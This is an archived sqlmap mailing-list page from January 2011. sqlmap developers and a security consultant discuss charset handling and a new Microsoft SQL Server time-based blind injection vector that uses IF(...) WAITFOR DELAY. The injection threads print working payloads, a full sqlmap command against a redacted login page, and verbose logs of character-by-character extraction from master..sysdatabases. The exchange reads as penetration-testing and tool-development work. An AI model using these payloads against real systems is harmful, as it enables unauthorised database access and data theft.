sqlmap-users Mailing List for sqlmap (Page 111)
Brought to you by:
inquisb
You can subscribe to this list here.
2008 |
Jan
|
Feb
|
Mar
|
Apr
|
May
|
Jun
|
Jul
|
Aug
|
Sep
(4) |
Oct
(11) |
Nov
(24) |
Dec
(13) |
---|---|---|---|---|---|---|---|---|---|---|---|---|
2009 |
Jan
(23) |
Feb
(17) |
Mar
(13) |
Apr
(48) |
May
(22) |
Jun
(18) |
Jul
(22) |
Aug
(13) |
Sep
(23) |
Oct
(6) |
Nov
(11) |
Dec
(25) |
2010 |
Jan
(21) |
Feb
(33) |
Mar
(61) |
Apr
(47) |
May
(48) |
Jun
(30) |
Jul
(24) |
Aug
(37) |
Sep
(52) |
Oct
(59) |
Nov
(32) |
Dec
(57) |
2011 |
Jan
(166) |
Feb
(93) |
Mar
(65) |
Apr
(117) |
May
(87) |
Jun
(124) |
Jul
(102) |
Aug
(78) |
Sep
(65) |
Oct
(22) |
Nov
(71) |
Dec
(79) |
2012 |
Jan
(93) |
Feb
(55) |
Mar
(45) |
Apr
(49) |
May
(56) |
Jun
(93) |
Jul
(95) |
Aug
(42) |
Sep
(26) |
Oct
(36) |
Nov
(32) |
Dec
(46) |
2013 |
Jan
(36) |
Feb
(78) |
Mar
(38) |
Apr
(57) |
May
(35) |
Jun
(39) |
Jul
(23) |
Aug
(33) |
Sep
(28) |
Oct
(38) |
Nov
(22) |
Dec
(16) |
2014 |
Jan
(33) |
Feb
(23) |
Mar
(41) |
Apr
(29) |
May
(12) |
Jun
(20) |
Jul
(21) |
Aug
(23) |
Sep
(18) |
Oct
(34) |
Nov
(12) |
Dec
(39) |
2015 |
Jan
(2) |
Feb
(51) |
Mar
(10) |
Apr
(28) |
May
(9) |
Jun
(22) |
Jul
(32) |
Aug
(35) |
Sep
(29) |
Oct
(50) |
Nov
(8) |
Dec
(2) |
2016 |
Jan
(8) |
Feb
(2) |
Mar
(3) |
Apr
(14) |
May
|
Jun
|
Jul
|
Aug
(12) |
Sep
|
Oct
|
Nov
(1) |
Dec
(19) |
2017 |
Jan
|
Feb
(18) |
Mar
|
Apr
(1) |
May
|
Jun
|
Jul
|
Aug
(4) |
Sep
|
Oct
|
Nov
(2) |
Dec
|
2018 |
Jan
|
Feb
|
Mar
(1) |
Apr
(1) |
May
(3) |
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
2019 |
Jan
|
Feb
|
Mar
|
Apr
(3) |
May
|
Jun
|
Jul
|
Aug
|
Sep
|
Oct
|
Nov
|
Dec
|
From: Miroslav S. <mir...@gm...> - 2011-01-18 11:11:38
|
hi mitchell. thank you for your answer. i thought that nobody would :) we've done some serious work these days in this field and would like to have it "stabilized". plz report any "strange" behavior in this field if you encounter it. kr On Tue, Jan 18, 2011 at 12:01 PM, mitchell <mit...@tu...> wrote: > Hi Miroslav, > > In say 80% of the cases I delt with Bulgarian sites, the data in the > database used the same encoding as the encoding announced on the webpage, > usually CP-1251. The rest use UTF. > > # mitchell > > On 17 Jan 2011 16:52, "Miroslav Stampar" <mir...@gm...> wrote: >> Hi all. >> >> I have a general question to all those pentesters that are retrieving data >> from sites with "funny" charset encodings (...russian, chinese...). >> >> What's should be the general "consensus" for data retrieval: >> >> A) assume that the backend DBMS uses the "utf8" charset encoding >> or >> B) treat data retrieved with the same encoding as used in the page >> or >> C) find out the proper collation used and use that one? (i am not a fan of >> this one :) >> or >> D) don't care (some people tend to use mixed collations which is quite >> romantic) >> >> Also, I would like to ask you all to try out the latest revision with >> cases >> that could be problematic and report impressions. >> >> Kind regards > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Andres R. <and...@gm...> - 2011-01-18 10:48:38
|
+1 ! -- Andres Riancho El ene 17, 2011 8:34 p.m., "Miroslav Stampar" <mir...@gm...> escribió: ...but still, i must say that this is quite good idea: "One way to increase the quality with little speed overhead would be an option to verify the charac... and we'll try to implement it kr On Tue, Jan 18, 2011 at 12:31 AM, Miroslav Stampar <mir...@gm...> wrote: > Hi Steve. ... |
From: Antonios A. <ant...@gm...> - 2011-01-18 06:33:42
|
Hi Miroslav, thanks a lot. It does work. I really appreciate that. regards Antonios 2011/1/18 Miroslav Stampar <mir...@gm...> > Hi Antonios. > > You probably want to use switch --batch: > > "--batch Never ask for user input, use the default behaviour" > > KR > > On Mon, Jan 17, 2011 at 10:36 PM, Antonios Atlasis > <ant...@gm...> wrote: > > > > Hello to the list. > > > > while trying to parse targets from webscarab logs, I'd like to ask you if > > there is an option to automatically answer "Yes" to sqlmap questions to > test > > the several URLs. > > > > Thanks in advance > > > > Antonios > > > > > ------------------------------------------------------------------------------ > > Protect Your Site and Customers from Malware Attacks > > Learn about various malware tactics and how to avoid them. Understand > > malware threats, the impact they can have on your business, and how you > > can protect your company and customers by using code signing. > > http://p.sf.net/sfu/oracle-sfdevnl > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > |
From: Steve P. <ste...@gm...> - 2011-01-18 02:17:08
|
On 01/17/2011 09:08 PM, Miroslav Stampar wrote: > "Since you seem anxious, I'll send the warm up." - you've thought that > i was kidding :) > > it was really a sincere mail and this is the core part: > "it's looks like an SQL abomination, and I can't still believe, but it > appears that this really works" Nah, just hadn't read that email yet, was talking about your excitement from before.. No worries mate. -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
From: Steve P. <ste...@gm...> - 2011-01-18 02:11:54
|
On 01/17/2011 08:47 PM, Miroslav Stampar wrote: > Steve. > > i owe you an apology and congrats - it appears that you've found a new > injection vector. > > it's looks like an SQL abomination, and I can't still believe, but it > appears that this really works: > > SELECT * FROM users WHERE id=1 IF(1=1) WAITFOR DELAY '0:0:1' > > i repeat, it looks like an SQL abomination but it works. i've just > tried with SSMS. > > kr > > p.s. i am still shocked :) > p.p.s. you are directly going into doc/THANKS :) > You're welcome. If sqlmap wasn't so easy to add new vectors to, I probably never would have shared that this works, just for not knowing no one else knew it works ;-) Thanks for an excellent product. (both of you, and all the other contributors over the years) -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
From: Miroslav S. <mir...@gm...> - 2011-01-18 02:08:52
|
"Since you seem anxious, I'll send the warm up." - you've thought that i was kidding :) it was really a sincere mail and this is the core part: "it's looks like an SQL abomination, and I can't still believe, but it appears that this really works" On Tue, Jan 18, 2011 at 3:05 AM, Miroslav Stampar <mir...@gm...> wrote: > well, i've apologized already. i've realized 15 minutes ago that this > really is a new sql injection vector. > > you can find yourself in the latest revision commit of doc/THANKS file. > > kr > > On Tue, Jan 18, 2011 at 2:59 AM, Steve Pinkham <ste...@gm...> wrote: >> On 01/17/2011 08:25 PM, Miroslav Stampar wrote: >>> ok, fair enough. >>> >>> please just send one of payloads used for data retrieval (something >>> like this one): >>> >>> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_ >>> name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > >>> 104), SLEEP(5), 9290) >>> >>> you'll see them with -v 3. you can censor table names. please, i just >>> want to see something workable used for data retrieval (just spot >>> those payloads with '>' inside) >>> >>> kr >> >> Since you seem anxious, I'll send the warm up.. Hasn't hit the good part >> yet. ;-) >> >> [09:41:40] [INFO] fetching database names >> [09:41:40] [INFO] fetching number of databases >> [09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:41:40] [WARNING] time-based comparison needs larger statistical >> model. Making a few dummy requests, please wait.. >> [09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND >> 'MQWi'='MQWi >> [09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT >> ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM >> master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi >> [09:43:37] [INFO] retrieved: 24 >> [09:43:37] [DEBUG] performed 10 queries in 117 seconds >> >> >> >> -- >> | Steven Pinkham, Security Consultant | >> | http://www.mavensecurity.com | >> | GPG public key ID CD31CAFB | >> >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Miroslav S. <mir...@gm...> - 2011-01-18 02:05:55
|
well, i've apologized already. i've realized 15 minutes ago that this really is a new sql injection vector. you can find yourself in the latest revision commit of doc/THANKS file. kr On Tue, Jan 18, 2011 at 2:59 AM, Steve Pinkham <ste...@gm...> wrote: > On 01/17/2011 08:25 PM, Miroslav Stampar wrote: >> ok, fair enough. >> >> please just send one of payloads used for data retrieval (something >> like this one): >> >> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_ >> name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > >> 104), SLEEP(5), 9290) >> >> you'll see them with -v 3. you can censor table names. please, i just >> want to see something workable used for data retrieval (just spot >> those payloads with '>' inside) >> >> kr > > Since you seem anxious, I'll send the warm up.. Hasn't hit the good part > yet. ;-) > > [09:41:40] [INFO] fetching database names > [09:41:40] [INFO] fetching number of databases > [09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:41:40] [WARNING] time-based comparison needs larger statistical > model. Making a few dummy requests, please wait.. > [09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND > 'MQWi'='MQWi > [09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT > ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM > master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi > [09:43:37] [INFO] retrieved: 24 > [09:43:37] [DEBUG] performed 10 queries in 117 seconds > > > > -- > | Steven Pinkham, Security Consultant | > | http://www.mavensecurity.com | > | GPG public key ID CD31CAFB | > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Steve P. <ste...@gm...> - 2011-01-18 01:59:22
|
On 01/17/2011 08:25 PM, Miroslav Stampar wrote: > ok, fair enough. > > please just send one of payloads used for data retrieval (something > like this one): > > [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_ > name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > > 104), SLEEP(5), 9290) > > you'll see them with -v 3. you can censor table names. please, i just > want to see something workable used for data retrieval (just spot > those payloads with '>' inside) > > kr Since you seem anxious, I'll send the warm up.. Hasn't hit the good part yet. ;-) [09:41:40] [INFO] fetching database names [09:41:40] [INFO] fetching number of databases [09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:41:40] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait.. [09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi [09:43:37] [INFO] retrieved: 24 [09:43:37] [DEBUG] performed 10 queries in 117 seconds -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
From: Miroslav S. <mir...@gm...> - 2011-01-18 01:48:02
|
Steve. i owe you an apology and congrats - it appears that you've found a new injection vector. it's looks like an SQL abomination, and I can't still believe, but it appears that this really works: SELECT * FROM users WHERE id=1 IF(1=1) WAITFOR DELAY '0:0:1' i repeat, it looks like an SQL abomination but it works. i've just tried with SSMS. kr p.s. i am still shocked :) p.p.s. you are directly going into doc/THANKS :) On Tue, Jan 18, 2011 at 2:33 AM, Steve Pinkham <ste...@gm...> wrote: > On 01/17/2011 06:48 PM, Bernardo Damele A. G. wrote: >> Steve, >> >> >> Are you saying that a query like: >> >> SELECT foo FROM table WHERE id=1 WAITFOR DELAY '0:0:10' >> >> is MSSQL-syntatically correct and works? If so, odd news :) > > Yes, sometimes interesting discoveries come from not knowing any better, > and flinging poo at the app. ;-) > > Unfortunately, I dont' have a MS test lab available, but I can confirm > that the injection works just fine on this SQL Server 2008 / ASP classic > application, and can't think of another reason why it would. > > First I tested in burp, with post data: > id=asdf'IF('1'%3d'1')+WAITFOR+DELAY+'0:0:20&pwd=asdf > there is a 23 second delay with the app, and with > id=asdf'IF('1'%3d'2')+WAITFOR+DELAY+'0:0:20&pwd=asdf > there is a 3 second delay. > > After adding the patch, sqlmap has so far extracted enough of the > version details and banner to be sure the patch works on this particular > app. > > I wish I had a bunch of SQL server versions to test it on, but I don't > at the moment. Anyone else have a MSDN subscription or test lab already > built who can verify this is repeatable? > > -- > | Steven Pinkham, Security Consultant | > | http://www.mavensecurity.com | > | GPG public key ID CD31CAFB | > > > ------------------------------------------------------------------------------ > Protect Your Site and Customers from Malware Attacks > Learn about various malware tactics and how to avoid them. Understand > malware threats, the impact they can have on your business, and how you > can protect your company and customers by using code signing. > http://p.sf.net/sfu/oracle-sfdevnl > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Steve P. <ste...@gm...> - 2011-01-18 01:34:02
|
On 01/17/2011 06:48 PM, Bernardo Damele A. G. wrote: > Steve, > > > Are you saying that a query like: > > SELECT foo FROM table WHERE id=1 WAITFOR DELAY '0:0:10' > > is MSSQL-syntatically correct and works? If so, odd news :) Yes, sometimes interesting discoveries come from not knowing any better, and flinging poo at the app. ;-) Unfortunately, I dont' have a MS test lab available, but I can confirm that the injection works just fine on this SQL Server 2008 / ASP classic application, and can't think of another reason why it would. First I tested in burp, with post data: id=asdf'IF('1'%3d'1')+WAITFOR+DELAY+'0:0:20&pwd=asdf there is a 23 second delay with the app, and with id=asdf'IF('1'%3d'2')+WAITFOR+DELAY+'0:0:20&pwd=asdf there is a 3 second delay. After adding the patch, sqlmap has so far extracted enough of the version details and banner to be sure the patch works on this particular app. I wish I had a bunch of SQL server versions to test it on, but I don't at the moment. Anyone else have a MSDN subscription or test lab already built who can verify this is repeatable? -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
From: Miroslav S. <mir...@gm...> - 2011-01-18 01:25:20
|
ok, fair enough. please just send one of payloads used for data retrieval (something like this one): [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_ name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > 104), SLEEP(5), 9290) you'll see them with -v 3. you can censor table names. please, i just want to see something workable used for data retrieval (just spot those payloads with '>' inside) kr On Tue, Jan 18, 2011 at 2:20 AM, Steve Pinkham <ste...@gm...> wrote: > On 01/17/2011 07:54 PM, Miroslav Stampar wrote: >> hi again. >> >> have you tried to use it? i am interested in data retrieval part :))))) >> >> (please use -v 3) >> >> kr >> > And yes, I have pulled data with it. That's where the time based data > with a few errors came from before. > > > -- > | Steven Pinkham, Security Consultant | > | http://www.mavensecurity.com | > | GPG public key ID CD31CAFB | > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Steve P. <ste...@gm...> - 2011-01-18 01:20:18
|
On 01/17/2011 07:54 PM, Miroslav Stampar wrote: > hi again. > > have you tried to use it? i am interested in data retrieval part :))))) > > (please use -v 3) > > kr > And yes, I have pulled data with it. That's where the time based data with a few errors came from before. -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
From: Steve P. <ste...@gm...> - 2011-01-18 01:17:58
|
On 01/17/2011 07:54 PM, Miroslav Stampar wrote: > hi again. > > have you tried to use it? i am interested in data retrieval part :))))) > > (please use -v 3) > > kr Can you be more specific as to what you would like to see? I have to redact the data for a few reasons, and the less I can send the better... -- | Steven Pinkham, Security Consultant | | http://www.mavensecurity.com | | GPG public key ID CD31CAFB | |
From: Miroslav S. <mir...@gm...> - 2011-01-18 00:54:43
|
hi again. have you tried to use it? i am interested in data retrieval part :))))) (please use -v 3) kr On Tue, Jan 18, 2011 at 1:48 AM, Steve Pinkham <ste...@gm...> wrote: > On 01/17/2011 07:02 PM, Miroslav Stampar wrote: >> Hi Steve. >> >> Thank you for your patch but I am not sure from SQL's perspective how >> this could work? >> >> So, basically, you are proposing time based sql injection payload (e.g.): >> >> IF(1=1) WAITFOR DELAY '0:0:1' >> >> and to be honest, I am not sure in which form, other than "stacked" >> this could fit in?? >> >> KR >> > Donno, not a SQL guru, just know it works on SQL Server 2008 anyway ;-) > Should work as an OR or AND statement, but then the present logical > state of the query matters. > > > Here's the output from my successful run using the patch, sanitised for > public viewing: > ./sqlmap.py -u https://BogusExample.com/Login******.asp --method=POST > --data='id=asdf&pwd=asdf' -p id --time-sec=20 --dbms='Microsoft SQL Server' > > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 05:54:02 > > [05:54:02] [INFO] using 'bogonExampleData' as session file > [05:54:02] [INFO] testing connection to the target url > [05:54:02] [WARNING] the testable parameter 'id' you provided is not > into the Cookie > [05:54:02] [INFO] testing if the url is stable, wait a few seconds > [05:54:04] [INFO] url is stable > [05:54:08] [WARNING] heuristic test shows that POST parameter 'id' might > not be injectable > [05:54:08] [INFO] testing sql injection on POST parameter 'id' > [05:54:08] [INFO] testing 'AND boolean-based blind - WHERE clause' > [05:54:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - > WHERE clause' > [05:54:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based' > [05:55:02] [INFO] POST parameter 'id' is 'Microsoft SQL Server/Sybase > time-based' injectable > [05:55:02] [INFO] testing 'Generic NULL UNION query - 1 to 3 columns' > POST parameter 'id' is vulnerable. Do you want to keep testing the > others? [y/N] > sqlmap identified the following injection points with a total of 31 > HTTP(s) requests: > --- > Place: POST > Parameter: id > Type: stacked queries > Title: Microsoft SQL Server/Sybase time-based > Payload: id=asdf' WAITFOR DELAY '0:0:20'-- AND 'uNsX'='uNsX&pwd=asdf > --- > > [05:55:18] [INFO] testing Microsoft SQL Server > [05:55:38] [INFO] confirming Microsoft SQL Server > [05:56:40] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows Vista > web application technology: ASP.NET, ASP, Microsoft IIS 7.0 > back-end DBMS: Microsoft SQL Server 2008 > [05:56:40] [WARNING] HTTP error codes detected during testing: > 500 (Internal Server Error) - 18 times > [05:56:40] [INFO] Fetched data logged to text files under 'bogonExampleData' > [*] shutting down at: 05:56:40 > > > > -- > | Steven Pinkham, Security Consultant | > | http://www.mavensecurity.com | > | GPG public key ID CD31CAFB | > > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
From: Steve P. <ste...@gm...> - 2011-01-18 00:48:25
|
On 01/17/2011 07:02 PM, Miroslav Stampar wrote: > Hi Steve. > > Thank you for your patch but I am not sure from SQL's perspective how > this could work? > > So, basically, you are proposing time based sql injection payload (e.g.): > > IF(1=1) WAITFOR DELAY '0:0:1' > > and to be honest, I am not sure in which form, other than "stacked" > this could fit in?? > > KR > Donno, not a SQL guru, just know it works on SQL Server 2008 anyway ;-) Should work as an OR or AND statement, but then the present logical state of the query matters. Here's the output from my successful run using the patch, sanitised for public viewing: ./sqlmap.py -u https://BogusExample.com/Login******.asp --method=POST --data='id=asdf&pwd=asdf' -p id --time-sec=20 --dbms='Microsoft SQL Server' sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 05:54:02 [05:54:02] [INFO] using 'bogonExampleData' as session file [05:54:02] [INFO] testing connection to the target url [05:54:02] [WARNING] the testable parameter 'id' you provided is not into the Cookie [05:54:02] [INFO] testing if the url is stable, wait a few seconds [05:54:04] [INFO] url is stable [05:54:08] [WARNING] heuristic test shows that POST parameter 'id' might not be injectable [05:54:08] [INFO] testing sql injection on POST parameter 'id' [05:54:08] [INFO] testing 'AND boolean-based blind - WHERE clause' [05:54:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE clause' [05:54:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based' [05:55:02] [INFO] POST parameter 'id' is 'Microsoft SQL Server/Sybase time-based' injectable [05:55:02] [INFO] testing 'Generic NULL UNION query - 1 to 3 columns' POST parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 31 HTTP(s) requests: --- Place: POST Parameter: id Type: stacked queries Title: Microsoft SQL Server/Sybase time-based Payload: id=asdf' WAITFOR DELAY '0:0:20'-- AND 'uNsX'='uNsX&pwd=asdf --- [05:55:18] [INFO] testing Microsoft SQL Server [05:55:38] [INFO] confirming Microsoft SQL Server [05:56:40] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows Vista web application technology: ASP.NET, ASP, Microsoft IIS 7.0 back-end DBMS: Microsoft SQL Server 2008 